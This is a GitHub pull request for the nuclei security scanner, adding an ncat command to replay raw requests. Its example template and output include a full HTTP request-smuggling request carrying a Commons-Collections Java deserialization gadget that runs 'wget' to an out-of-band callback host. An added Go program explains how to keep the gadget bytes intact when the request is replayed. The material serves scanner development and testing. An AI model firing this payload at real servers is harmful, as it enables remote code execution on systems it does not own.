Add ncat command to replicate raw request #5243

Open
wants to merge 33 commits into dev

Conversation

cn-kali-team
Contributor

@cn-kali-team cn-kali-team commented May 31, 2024

Proposed changes

Checklist

  • Pull request is created against the dev branch
  • All checks passed (lint, unit/integration/regression tests etc.) with my changes
  • I have added tests that prove my fix is effective or that my feature works
  • I have added necessary documentation (if appropriate)

Template:

id: test

info:
  name: Ncat Command Test
  author: x
  severity: high
  description: |
    Ncat Command Test Template
  metadata:
    verified: true
    max-request: 1
  tags: raw

http:
  - raw:
      - |+
        GET /test1 HTTP/1.1
        Host: 192.168.83.196:8081
        Content-Length: 42
        Transfer-Encoding: chunked

        0
        
        GET /test1 HTTP/1.1
        Host: 192.168.83.196:8081
        X: GET http://192.168.83.1:8080/admin.jsp HTTP/1.0

        {{generate_java_gadget("commons-collections3.1", "wget http://{{interactsh-url}}", "raw")}}

    unsafe: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'c'

Test Run:

go run cmd/nuclei/main.go --duc -t /home/kali-team/test.yaml -u http://127.0.0.1:9015 -irr -j | jq -r '."curl-command"'

Output

printf 'GET /test1 HTTP/1.1\r\n'\
'Host: 192.168.83.196:8081\r\n'\
'Content-Length: 42\r\n'\
'Transfer-Encoding: chunked\r\n'\
'\r\n'\
'0\r\n'\
'\r\n'\
'GET /test1 HTTP/1.1\r\n'\
'Host: 192.168.83.196:8081\r\n'\
'X: GET http://192.168.83.1:8080/admin.jsp HTTP/1.0\r\n'\
'\r\n'\
'\u00ac\u00ed\x00\x05sr\x00\x11java.util.HashSet\u00baD\u0085\u0095\u0096\u00b8\u00b74\x03\x00\x00xpw\f\x00\x00\x00\x02?@\x00\x00\x00\x00\x00\x01sr\x004org.apache.commons.collections.keyvalue.TiedMapEntry\u008a\u00ad\u00d2\u009b9\u00c1\x1f\u00db\x02\x00\x02L\x00\x03keyt\x00\x12Ljava/lang/Object;L\x00\x03mapt\x00\x0fLjava/util/Map;xpt\x00&https://github.com/joaomatosf/jexboss sr\x00*org.apache.commons.collections.map.LazyMapn\u00e5\u0094\u0082\u009ey\x10\u0094\x03\x00\x01L\x00\afactoryt\x00,Lorg/apache/commons/collections/Transformer;xpsr\x00:org.apache.commons.collections.functors.ChainedTransformer0\u00c7\u0097\u00ec(z\u0097\x04\x02\x00\x01[\x00\riTransformerst\x00-[Lorg/apache/commons/collections/Transformer;xpur\x00-[Lorg.apache.commons.collections.Transformer;\u00bdV*\u00f1\u00d84\x18\u0099\x02\x00\x00xp\x00\x00\x00\x05sr\x00;org.apache.commons.collections.functors.ConstantTransformerXv\u0090\x11A\x02\u00b1\u0094\x02\x00\x01L\x00\tiConstantq\x00~\x00\x03xpvr\x00\x11java.lang.Runtime\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00xpsr\x00:org.apache.commons.collections.functors.InvokerTransformer\u0087\u00e8\u00ffk{|\u00ce8\x02\x00\x03[\x00\x05iArgst\x00\x13[Ljava/lang/Object;L\x00\viMethodNamet\x00\x12Ljava/lang/String;[\x00\viParamTypest\x00\x12[Ljava/lang/Class;xpur\x00\x13[Ljava.lang.Object;\u0090\u00ceX\u009f\x10s)l\x02\x00\x00xp\x00\x00\x00\x02t\x00\ngetRuntimeur\x00\x12[Ljava.lang.Class;\u00ab\x16\u00d7\u00ae\u00cb\u00cdZ\u0099\x02\x00\x00xp\x00\x00\x00\x00t\x00\tgetMethoduq\x00~\x00\x1b\x00\x00\x00\x02vr\x00\x10java.lang.String\u00a0\u00f0\u00a48z;\u00b3B\x02\x00\x00xpvq\x00~\x00\x1bsq\x00~\x00\x13uq\x00~\x00\x18\x00\x00\x00\x02puq\x00~\x00\x18\x00\x00\x00\x00t\x00\x06invokeuq\x00~\x00\x1b\x00\x00\x00\x02vr\x00\x10java.lang.Object\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00xpvq\x00~\x00\x18sq\x00~\x00\x13ur\x00\x13[Ljava.lang.String;\u00ad\u00d2V\u00e7\u00e9\x1d{G\x02\x00\x00xp\x00\x00\x00\x01t\x007wget http://cpcpj9usep53a5glte30tsb9pq3isa1e8.oast.livet\x00\x04execuq\x00~\x00\x1b\x00\x00\x00\x01q\x00~\x00 sq\x00~\x00\x0fsr\x00\x11java.lang.Integer\x12\u00e2\u00a0\u00a4\u00f7\u0081\u00878\x02\x00\x01I\x00\x05valuexr\x00\x10java.lang.Number\u0086\u00ac\u0095\x1d\v\u0094\u00e0\u008b\x02\x00\x00xp\x00\x00\x00\x01sr\x00\x11java.util.HashMap\x05\a\u00da\u00c1\u00c3\x16`\u00d1\x03\x00\x02F\x00\nloadFactorI\x00\tthresholdxp?@\x00\x00\x00\x00\x00\x00w\b\x00\x00\x00\x10\x00\x00\x00\x00xxx\r\n'\
'\r\n'\
'\r\n'\
|ncat 127.0.0.1 9015
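The printf | ncat pipeline above is what the PR prints for a raw request. As an added example that is not part of the PR or of nuclei's own code, the Go program below builds the same kind of replay command from arbitrary request bytes and then parses the command back the way bash would, so the bytes that hit the wire can be checked against the bytes in the template. The names (NcatReplay, ShellPrintfBytes, escapeByte, SampleRequest), the constructed sample request and the 127.0.0.1:9015 target are assumptions for the example; it also assumes the command is run under bash, since \xHH escapes in printf are a bash extension rather than POSIX. Two points matter when replaying raw requests this way: a % in the request (URL-encoded paths are common) must be doubled or printf treats it as a conversion, and bytes >= 0x80 should be written as \xHH, because bash expands \u00ac (as in the output above) to the UTF-8 encoding of U+00AC, 0xC2 0xAC, in a UTF-8 locale, so a serialized Java stream whose magic is 0xAC 0xED 0x00 0x05 would not reach the target intact.

```go
package main

import (
	"fmt"
	"strconv"
	"strings"
)

// SampleRequest is constructed for this example (not from the PR), shaped like
// the template above: a CL.TE body, a second request carrying shell and printf
// metacharacters, and a body opening with the Java serialization magic AC ED 00 05.
var SampleRequest = []byte("GET /test1?q=100%25 HTTP/1.1\r\nHost: 192.168.83.196:8081\r\n" +
	"Content-Length: 42\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\n" +
	"GET /test1 HTTP/1.1\r\nHost: 192.168.83.196:8081\r\n" +
	"X: it's GET http://192.168.83.1:8080/admin.jsp HTTP/1.0\r\n\r\n" +
	"\xac\xed\x00\x05sr\x00\x11java.util.HashSet\r\n")

// fixed: CR/LF kept readable, backslash and single quote protected from bash
// ('\'' closes the quote, adds an escaped quote, reopens), % doubled for printf.
var fixed = map[byte]string{'\r': `\r`, '\n': `\n`, '\\': `\\`, '%': "%%", '\'': `'\''`}

// escapeByte renders one request byte as bash printf format text. Anything not
// printable ASCII becomes \xHH, which bash's printf emits as exactly that byte
// (unlike \uHHHH, which it re-encodes as UTF-8).
func escapeByte(b byte) string {
	if s, ok := fixed[b]; ok {
		return s
	}
	if b >= 0x20 && b < 0x7f {
		return string([]byte{b})
	}
	return fmt.Sprintf(`\x%02x`, b)
}

// NcatReplay builds "printf '...' | ncat host port" for arbitrary request bytes,
// one single-quoted chunk per line joined by backslash-newline, as shown above.
func NcatReplay(raw []byte, host string, port int) string {
	var sb strings.Builder
	sb.WriteString("printf '")
	for i, b := range raw {
		sb.WriteString(escapeByte(b))
		if b == '\n' && i != len(raw)-1 {
			sb.WriteString("'\\\n'") // end this chunk, continue on the next line
		}
	}
	sb.WriteString("'\\\n")
	fmt.Fprintf(&sb, "| ncat %s %d", host, port)
	return sb.String()
}

// unescape maps the single-letter printf escapes NcatReplay emits back to bytes.
var unescape = map[byte]byte{'r': '\r', 'n': '\n', '\\': '\\'}

// ShellPrintfBytes interprets the command the way bash would: shell quoting first
// (join quoted chunks, drop backslash-newline), then printf's escape rules.
func ShellPrintfBytes(cmd string) []byte {
	end := strings.LastIndex(cmd, "\n| ncat ")
	if !strings.HasPrefix(cmd, "printf ") || end < 0 {
		return nil
	}
	body := cmd[len("printf "):end]
	var format []byte
	inQuote := false
	for i := 0; i < len(body); i++ {
		switch c := body[i]; {
		case c == '\'':
			inQuote = !inQuote
		case !inQuote && c == '\\' && i+1 < len(body):
			i++
			if body[i] != '\n' {
				format = append(format, body[i])
			}
		case inQuote:
			format = append(format, c)
		}
	}
	var out []byte
	for i := 0; i < len(format); i++ {
		c, next := format[i], byte(0)
		if i+1 < len(format) {
			next = format[i+1]
		}
		switch {
		case c == '%' && next == '%':
			out = append(out, '%')
			i++
		case c == '\\' && next == 'x' && i+3 < len(format):
			v, err := strconv.ParseUint(string(format[i+2:i+4]), 16, 8)
			if err != nil {
				return nil
			}
			out = append(out, byte(v))
			i += 3
		case c == '\\' && unescape[next] != 0:
			out = append(out, unescape[next])
			i++
		default:
			out = append(out, c)
		}
	}
	return out
}

func main() {
	cmd := NcatReplay(SampleRequest, "127.0.0.1", 9015)
	fmt.Println(cmd)
	fmt.Println("round-trips:", string(ShellPrintfBytes(cmd)) == string(SampleRequest))
}
```

Running it prints the replay command for the constructed request followed by "round-trips: true"; swapping the \xHH branch for a \u00HH rendering makes the comparison fail on the first byte of the Java stream, which is the mismatch to look for when a replayed gadget chain does not fire.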

ehsandeep and others added 30 commits October 20, 2023 11:57
…ctdiscovery#4252)

Bumps [github.com/gin-gonic/gin](https://github.com/gin-gonic/gin) from 1.9.0 to 1.9.1.
- [Release notes](https://github.com/gin-gonic/gin/releases)
- [Changelog](https://github.com/gin-gonic/gin/blob/master/CHANGELOG.md)
- [Commits](gin-gonic/gin@v1.9.0...v1.9.1)

---
updated-dependencies:
- dependency-name: github.com/gin-gonic/gin
  dependency-type: indirect
...

Signed-off-by: dependabot[bot] <[email protected]>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>

Bumps [github.com/docker/docker](https://github.com/docker/docker) from 24.0.5+incompatible to 24.0.7+incompatible.
- [Release notes](https://github.com/docker/docker/releases)
- [Commits](moby/moby@v24.0.5...v24.0.7)

---
updated-dependencies:
- dependency-name: github.com/docker/docker
  dependency-type: indirect
...

Signed-off-by: dependabot[bot] <[email protected]>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
@GeorginaReeder

Thanks for your contribution @cn-kali-team , we appreciate it!
